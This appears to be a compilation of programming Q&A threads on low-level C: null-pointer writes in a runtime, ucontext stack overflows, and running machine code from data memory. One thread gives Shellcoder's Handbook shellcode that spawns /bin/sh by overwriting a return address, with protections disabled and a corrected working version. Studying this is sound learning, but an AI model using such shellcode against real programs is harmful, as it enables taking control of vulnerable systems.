In the following piece of code, what does *(int32 *) 0 = 0; mean?
void
function (void)
{
...
for (;;)
*(int32 *) 0 = 0; /* What does this line do? */
}
A few notes:
The code seems to not be reachable, as there is an exit statement before that particular piece of code.
int32 is typedef'ed but you shouldn't care too much about it.
This piece of code is from a language's runtime in a compiler, for anyone interested.
The code is doing the following:
for (;;) // while(true)
*(int32 *) 0 = 0; // Treat 0 as an address, de-reference the 0 address and try and store 0 into it.
This should segfault: it is a null pointer dereference.
EDIT
Compiled and ran for further information:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
int main(void){
*(int32_t *) 0 = 0;
printf("done\n");
return 0;
}
gcc -g null.c; ./a.out
Program received signal SIGSEGV, Segmentation fault.
0x00000000004004cd in main () at null.c:7
7 *(int32_t *) 0 = 0;
Since the OP states the code was written by experienced compiler engineers, it is possible this is the intent of the code:
*(int32 *) 0 = 0; is recognized by this specific C implementation as code that causes behavior not defined by the C standard and known to this implementation to be illegal.
The for (;;) additionally indicates that this code is never exited.
The compiler engineers know that the optimizer will recognize this code and deduce that it may be “optimized away”, because any program that reaches this code is permitted to have any behavior, so the optimizer may choose to give it the behavior as if the code is never reached.1
This sort of reasoning is possible only if you have specific knowledge of the internal operation of a C implementation. It is the sort of thing a compiler engineer might include in special headers for a C implementation, perhaps to mark that certain code (such as code after an abort call) is never reached. It should never be used in normal programming.
1 For example, consider this code:
if (a)
for (;;)
*(int32 *) 0 = 0;
else
foo();
The compiler can recognize that the then-clause is permitted to have any behavior. Therefore, the compiler is free to choose what behavior it has. For simplicity, it chooses it to have the same behavior as foo();. Then the code becomes:
if (a)
foo();
else
foo();
and can be further simplified to:
foo();
The fact that this code segfaults doesn't explain why it exists =)
I think it comes from the runtime of some MCU. It is there because, if execution ever reaches this point, the instruction will either trigger a software reset of the MCU, so the program restarts (a common practice in embedded development), or, if the MCU is configured with a hardware watchdog, the never-ending loop will let the watchdog force a restart.
The main goal of such constructions is to raise an interrupt or fault that can be handled by the OS or by the hardware to initiate some action.
Given that it's x86, the effect depends on the CPU mode. In Real Mode nothing happens immediately if there is no watchdog. Address 0 holds the address of the 'divide by 0' handler, so on an old MS-DOS or embedded x86 runtime the store changes that handler's address to 0; as soon as that interrupt fires (and is not masked), the CPU jumps to 0:0 and will probably just restart because of an illegal instruction. In protected or VM x86 mode, it's a way to notify the OS or another supervisor that there is a problem in the runtime and the program should be 'killed' externally.
for(;;) is equivalent to while(1).
*(int32 *) 0 = 0; writes 0 through a dereferenced null pointer, which is expected to cause a crash but is not guaranteed to on every compiler; see "Crashing threads with *(int*)NULL = 1; problematic?".
It's an infinite loop of undefined behavior (dereferencing a null pointer). It's likely to crash with a segfault on *n*x or Access Violation on Windows.
Mike's comment is pretty well correct: it's storing the VALUE zero at the ADDRESS 0.
Which will be a crash on most machines.
The original IBM PC stored the interrupt vector table in the lowest 1 KiB of memory. Hence writing a 32-bit value to address 0 on such an architecture would overwrite the vector for INT 00h, which on x86 is the divide-error exception.
On basically anything modern (meaning in x86/x86-64 parlance anything running in protected or long mode), it will trigger a segmentation fault unless you are in ring 0 (kernel mode) because you are stepping outside of your process' allowed address dereference range.
As the dereference is undefined behavior (as already stated), a segmentation fault is a perfectly acceptable way to handle that situation. If you know that on the target architecture a zero address dereference causes a segmentation fault, it seems to be a pretty sure way to get the application to crash. If exit() returns, that's probably what you want to do, since something just went horribly wrong. That the code is from a particular compiler's runtime means whoever wrote it can take advantage of knowledge of the internal workings of the compiler and runtime, as well as tailor it to the specific target architecture's behavior.
It could be that the compiler doesn't know exit() doesn't return, but it does know this construct does not return.
I was working on a project for a course on Operating Systems. The task was to implement a library for dealing with threads, similar to pthreads, but much simpler. Its purpose is to practice scheduling algorithms. The final product is a .a file. The course is over and everything worked just fine (in terms of functionality).
Though, I got curious about an issue I faced. On three different functions of my source file, if I add the following line, for instance:
fprintf(stderr, "My lucky number is %d\n", 4);
I get a segmentation fault. The same doesn't happen if stdout is used instead, or if the formatting doesn't contain any variables.
That leaves me with two main questions:
Why does it only happen in three functions of my code, and not the others?
Could the creation of contexts using getcontext() and makecontext(), or the changing of contexts using setcontext() or swapcontext(), interfere with the standard file descriptors?
My intuition says those functions could be responsible for that, even more so given that the three functions in which this happens are functions that have contexts which other parts of the code switch to. The switch is usually done with setcontext(), though swapcontext() is used to go to the scheduler, which chooses another thread to execute.
Additionally, if that is the case, then:
What is the proper way to create threads using those functions?
I'm currently doing the following:
/*------------------------------------------------------------------------------
Funct: Creates an execution context for the function and arguments passed.
Input: uc -> Pointer where the context will be created.
funct -> Function to be executed in the context.
arg -> Argument to the function.
Return: If the function succeeds, 0 will be returned. Otherwise -1.
------------------------------------------------------------------------------*/
static int create_context(ucontext_t *uc, void *funct, void *arg)
{
if(getcontext(uc) != 0) // Gets a context "model"
{
return -1;
}
void *sp = malloc(STACK_SIZE); // Stack area for the execution context (raw bytes, not a stack_t)
if(!sp) // A stack area is mandatory
{
return -1;
}
uc->uc_stack.ss_sp = sp; // Sets stack pointer
uc->uc_stack.ss_size = STACK_SIZE; // Sets stack size
uc->uc_link = &context_end; // Sets the context to go after execution
makecontext(uc, funct, 1, arg); // "Makes everything work" (can't fail)
return 0;
}
This code is probably a little modified, but it is originally an online example of how to use ucontext.
Assuming glibc, the explanation is that fprintf with an unbuffered stream (such as stderr by default) internally creates an on-stack buffer which has a size of BUFSIZ bytes. See the function buffered_vfprintf in stdio-common/vfprintf.c. BUFSIZ is 8192, so you end up with a stack overflow because the stack you create is too small.
I have the following code which is supposed to drop a shell, however, after I run the code nothing appears to happen. Here is the code that I have. This was taken from the shellcoder's handbook.
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
}
I compile it using gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
When I run it the following happens.
The expected result is the following.
Here is the code that produces the above results:
int main()
{
char *name[2];
name[0] = "/bin/sh";
name[1] = 0x0;
execve(name[0], name, 0x0);
exit(0);
}
I am not sure why this is happening. I am using Ubuntu on Windows 10. This might not affect my results, but I have disabled ASLR. That might be an issue. I have not tried this on a VM just yet. I wanted to try and figure out why this is not working before I did that. If this is unclear please let me know and I will be happy to clarify any details.
I appreciate all of your help in advance.
--UPDATE--
I was able to get the assembly instructions from the shellcode I provided.
Does anyone see any issues that would cause a shell not to be dropped?
With the help of a colleague we were able to figure out why the shellcode was not executing. The shellcode is fine; the issue was actually an update to gcc that changes how the prologue and epilogue of main() are generated. When a program starts, the compiler-generated code puts the return address on the stack, but it does so using a new pattern. The program no longer uses the return address directly by popping it into the instruction pointer (IP). Instead, it pops the stack value into %ecx and then uses the contents at the address %ecx-4 (for 32-bit machines) as the return address. Therefore, the way I was trying to do it was never going to work, even with the protections turned off. This behavior only affects main() and not functions called by main(). So a simple solution is to place the contents of main() into another function foo() and call foo() from main(), as depicted below.
char shellcode[] =
"\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
"\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
"\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
void foo()
{
int *ret;
ret = (int *)&ret + 4;
(*ret) = (int)shellcode;
}
int main()
{
foo();
}
Here is a question that is related to this answer.
Understanding new gcc prologue
There are a couple of things that could go wrong here:
The store of the shell code address is optimized away because it is derived from a stack variable, and nothing reads from the stack afterwards.
The store is optimized away because it is out of bounds.
The offset calculation from the local variable is wrong, so the shellcode address does not overwrite the return address. (This is what happens when I compile your example.)
The execution is redirected, but the shellcode does not run because it is located in the non-executable .data segment. (That would cause the process to terminate with a signal, though.)
Is there any way to put processor instructions into array, make its memory segment executable and run it as a simple function:
int main()
{
unsigned char myarr[13] = {0x90, 0xc3}; /* nop; ret */
void (*myfunc)(void) = (void (*)(void)) myarr;
myfunc();
return 0;
}
On Unix (these days, that means "everything except Windows and some embedded and mainframe stuff you've probably never heard of") you do this by allocating a whole number of pages with mmap, writing the code into them, and then making them executable with mprotect.
void execute_generated_machine_code(const uint8_t *code, size_t codelen)
{
// in order to manipulate memory protection, we must work with
// whole pages allocated directly from the operating system.
static size_t pagesize;
if (!pagesize) {
pagesize = sysconf(_SC_PAGESIZE);
if (pagesize == (size_t)-1) fatal_perror("getpagesize");
}
// allocate at least enough space for the code + 1 byte
// (so that there will be at least one INT3 - see below),
// rounded up to a multiple of the system page size.
size_t rounded_codesize = ((codelen + 1 + pagesize - 1)
/ pagesize) * pagesize;
void *executable_area = mmap(0, rounded_codesize,
PROT_READ|PROT_WRITE,
MAP_PRIVATE|MAP_ANONYMOUS,
-1, 0);
if (executable_area == MAP_FAILED) fatal_perror("mmap"); // mmap reports failure with MAP_FAILED, not NULL
// at this point, executable_area points to memory that is writable but
// *not* executable. load the code into it.
memcpy(executable_area, code, codelen);
// fill the space at the end with INT3 instructions, to guarantee
// a prompt crash if the generated code runs off the end.
// must change this if generating code for non-x86.
memset((char *)executable_area + codelen, 0xCC, rounded_codesize - codelen); // cast: arithmetic on void * is a GNU extension
// make executable_area actually executable (and unwritable)
if (mprotect(executable_area, rounded_codesize, PROT_READ|PROT_EXEC))
fatal_perror("mprotect");
// now we can call it. passing arguments / receiving return values
// is left as an exercise (consult libffi source code for clues).
((void (*)(void)) executable_area)();
munmap(executable_area, rounded_codesize);
}
You can probably see that this code is very nearly the same as the Windows code shown in cherrydt's answer. Only the names and arguments of the system calls are different.
When working with code like this, it is important to know that many modern operating systems will not allow you to have a page of RAM that is simultaneously writable and executable. If I'd written PROT_READ|PROT_WRITE|PROT_EXEC in the call to mmap or mprotect, it would fail. This is called the W^X policy; the acronym stands for Write XOR eXecute. It originates with OpenBSD, and the idea is to make it harder for a buffer-overflow exploit to write code into RAM and then execute it. (It's still possible, the exploit just has to find a way to make an appropriate call to mprotect first.)
Depends on the platform.
For Windows, you can use this code:
// Allocate some memory as readable+writable
// TODO: Check return value for error
LPVOID memPtr = VirtualAlloc(NULL, sizeof(myarr), MEM_COMMIT, PAGE_READWRITE);
// Copy data
memcpy(memPtr, myarr, sizeof(myarr));
// Change memory protection to readable+executable
// Again, TODO: Error checking
DWORD oldProtection; // Not used but required for the function
VirtualProtect(memPtr, sizeof(myarr), PAGE_EXECUTE_READ, &oldProtection);
// Assign and call the function
void (*myfunc)(void) = (void (*)(void)) memPtr;
myfunc();
// Free the memory
VirtualFree(memPtr, 0, MEM_RELEASE);
This code assumes a myarr array as in your question's code, and it assumes that sizeof will work on it, i.e. it has a directly defined size and is not just a pointer passed from elsewhere. If the latter is the case, you would have to specify the size in another way.
Note that here there are two "simplifications" possible, in case you wonder, but I would advise against them:
1) You could call VirtualAlloc with PAGE_EXECUTE_READWRITE, but this is in general bad practice because it would open an attack vector for unwanted code execution.
2) You could call VirtualProtect on &myarr directly, but this would make executable whatever page of memory happens to contain your array, which is even worse than #1 because any other data in that page suddenly becomes executable as well.
For Linux, I found this on Google but I don't know much about it.
Very OS-dependent: not all OSes will deliberately (read: without a bug) allow you to execute code in the data segment. DOS will because it runs in Real Mode, Linux can also with the appropriate privileges. I don't know about Windows.
Casting is often undefined and has its own caveats, so some elaboration on that topic here. From C11 standard draft N1570, §J.5.7/1:
A pointer to an object or to void may
be cast to a pointer to a function, allowing data to be invoked as a
function (6.5.4).
(Formatting added.)
So, where the implementation supports it, this works as expected; note that Annex J.5 lists common extensions rather than guarantees of the standard. Of course, you need to adhere to the ABI's calling convention.
I'm trying to copy a function I have to an executable page and run it from there, but I seem to be having some problems.
Here is my code:
#include <stdio.h>
#include <string.h>
#include <windows.h>
int foo()
{
return 4;
}
int goo()
{
return 5;
}
int main()
{
int foosize = (int)&goo-(int)&foo;
char* buf = VirtualAlloc(NULL, foosize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (buf == NULL)
{
printf("Failed\n");
return 1;
}
printf("foo %x goo %x size foo %d\n", &foo, &goo, foosize);
memcpy (buf, (void*)&foo, foosize);
int(*f)() = &foo;
int ret1 = f();
printf("ret 1 %d\n", ret1);
int(*f2)() = (int(*)())&buf;
int ret2 = f2 (); // <-- crashes here
printf("ret2 %d\n", ret2);
return 0;
}
I know some of the code is technically UB ((int)&goo-(int)&foo), but it behaves fine in this case.
My question is why is this not working as expected?
It seems to me I mapped a page as executable, copied an existing function there, and am just calling it.
What am I missing?
Would this behave differently on linux with mmap?
Thanks in advance
As everyone has already stated in comments, this is totally undefined behavior and you should never really expect it to work. However, I played with your code in the debugger and realized that the reason it's not working (at least with Cygwin gcc) is that you're creating f2 incorrectly: it points to the address of the pointer that stores the allocated memory, namely buf. You want it to point to the memory that buf points to. Therefore, your assignment should be
int(*f2)() = (int(*)())buf;
With that change, your code executes for me. But even if it works, it might break again as soon as you make any additional changes to the program.
Well, I tried your code with MSVC 2008 in debug mode. The compiler happens to create a jump table with relative offsets, and &foo and &goo are just entries in that table.
So even if you successfully create an executable buffer and copy the code (much more than was useful...), the relative jump now points to a different location and (in my example) soon fell into an int 3 trap!
TL;DR: since the compiler can arrange its code at will, and since many jumps use relative offsets, you cannot rely on copying executable code. It really is undefined behaviour:
if the compiler had been smart enough to just generate something like:
mov AX, 4
ret
it could have worked;
if the compiler generated more complicated code with a relative jump, it just breaks.
Conclusion: you can only copy executable code if you have full control over the binary machine code, for example if you wrote it in assembly and know you will have no relocation problems.
You need to declare foo and goo as static, or you will have to disable Incremental Linking.
Incremental linking is used to shorten the linking time when building your applications. The difference between normally and incrementally linked executables is that, in incrementally linked ones, each function call goes through an extra JMP instruction emitted by the linker.
These JMPs allow the linker to move the functions around in memory without updating all the CALL instructions that reference the function. But it's exactly this JMP that causes problems in your case. Declaring a function as static prevents the linker from creating this extra JMP instruction.
I want to take a piece of code, copy it into a global array and execute it from there.
In other words, I am trying to copy a bunch of instructions from the code-section into the data-section, and then set the program-counter to continue the execution of the program from the data-section.
Here is my code:
#include <stdio.h>
#include <string.h>
typedef void(*func)();
static void code_section_func()
{
printf("hello");
}
#define CODE_SIZE 73
// I verified this size in the disassembly of 'code_section_func'
static long long data[(CODE_SIZE-1)/sizeof(long long)+1];
// I am using 'long long' in order to obtain the maximum alignment
int main()
{
func data_section_func = (func)data;
memcpy((void*)data_section_func,(void*)code_section_func,CODE_SIZE);
data_section_func();
return 0;
}
I might have been naive thinking it could work, so I'd be happy to get an explanation why it didn't.
For example, after a program is loaded into memory, does the MMU restrict instruction-fetching to a specific area within the memory address space of the process (i.e., the code-section of the program)?
For the record, I have tested this with the VS2013 compiler on a 64-bit OS and an x64-based processor.
Thanks
Windows (and many other modern OSes) by default sets the data section as read/write/no-execute, so attempting to "call" a data object will fail.
Instead, you should VirtualAlloc a chunk of memory with the PAGE_EXECUTE_READWRITE protection. Note, it may be necessary to use FlushInstructionCache to ensure the newly-copied code is executed.